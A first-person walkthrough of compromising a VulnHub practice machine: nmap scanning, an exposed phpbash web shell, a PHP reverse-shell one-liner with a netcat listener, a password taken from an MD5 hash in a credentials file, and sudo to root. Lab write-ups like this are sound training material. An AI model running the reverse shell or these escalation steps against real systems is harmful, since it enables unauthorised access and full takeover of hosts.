This is a vulnerable machine from vulnhub. You can find the machine here.
Run the machine using oracle virtual box.
First I needed to determine the ip address of the machine.Using the command below I found the ip.
 	sudo netdiscover
I run nmap to discover open ports an services using the command below.
	nmap -A <ip addr>
I found two ports open, 22 running ssh and 80 on http. since i didn't have neither the username or password, I decided to explore http instead of ssh. The results below showed there is an endpoint /phpbash.php which I exploreds

      22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
		| ssh-hostkey: 
		|   2048 61:16:10:91:bd:d7:6c:06:df:a2:b9:b5:b9:3b:dd:b6 (RSA)
		|   256 0e:a4:c9:fc:de:53:f6:1d:de:a9:de:e4:21:34:7d:1a (ECDSA)
		|_  256 ec:27:1e:42:65:1c:4a:3b:93:1c:a1:75:be:00:22:0d (ED25519)
		80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
		| http-methods: 
		|_  Potentially risky methods: TRACE
		| http-robots.txt: 1 disallowed entry 
		|_/phpbash.php
		|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
		|_http-title: Check your Privilege
		111/tcp  open  rpcbind 2-4 (RPC #100000)
		| rpcinfo: 
		|   program version    port/proto  service
		|   100000  2,3,4        111/tcp   rpcbind
		|   100000  2,3,4        111/udp   rpcbind
		|   100000  3,4          111/tcp6  rpcbind
		|   100000  3,4          111/udp6  rpcbind
		|   100003  3,4         2049/tcp   nfs
		|   100003  3,4         2049/tcp6  nfs
		|   100003  3,4         2049/udp   nfs
		|   100003  3,4         2049/udp6  nfs
		|   100005  1,2,3      20048/tcp   mountd
		|   100005  1,2,3      20048/tcp6  mountd
		|   100005  1,2,3      20048/udp   mountd
		|   100005  1,2,3      20048/udp6  mountd
		|   100021  1,3,4      34444/tcp6  nlockmgr
		|   100021  1,3,4      38908/udp6  nlockmgr
		|   100021  1,3,4      43507/tcp   nlockmgr
		|   100021  1,3,4      59386/udp   nlockmgr
		|   100024  1          35571/udp6  status
		|   100024  1          52534/tcp6  status
		|   100024  1          54983/udp   status
		|   100024  1          56937/tcp   status
		|   100227  3           2049/tcp   nfs_acl
		|   100227  3           2049/tcp6  nfs_acl
		|   100227  3           2049/udp   nfs_acl
		|_  100227  3           2049/udp6  nfs_acl
		2049/tcp open  nfs_acl 3 (RPC #100227)
Going to http://192.168.0.106//phpbash.php I found a linux terminal. I can perform a php reverse shell. 
Using netcat i opened a port to listen on using nc -lvp 4242.On the web shell, I used this code to get a reverse shell  
	php -r '$sock=fsockopen("host ip",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
I performed an ls and found a readme.txt. This file had a hint 
		Hint. Hi Find Armour User backup in /backup
Armour might be a user. Exploring the home directory I found armour as the user. I coud cd /home/armour
I found an interesting file inside the directory which provided a password.
	cat Credentials.txt
		my password is md5(rootroot1)
The password is likely a md5 hash of rootroot1.The command below will help encrypt it.
	echo -n 'rootroot1' | md5sum it gives b7bc8489abe360486b4b19dbc242e885
Now this is the password of armour. I can now swith user using the password above with the command below.
    su armour

I tried a few scripts to get an interactive shell and the command below worked. 
		script -q /dev/null
I am now the user armour and its time to check if we can escalate to root.I first checked the commands that the current user can perform without sudo using the command,
	sudo -l
Interestingly, armour can run sudo /bin/bash .This command calls sudo and voila, Iam root.



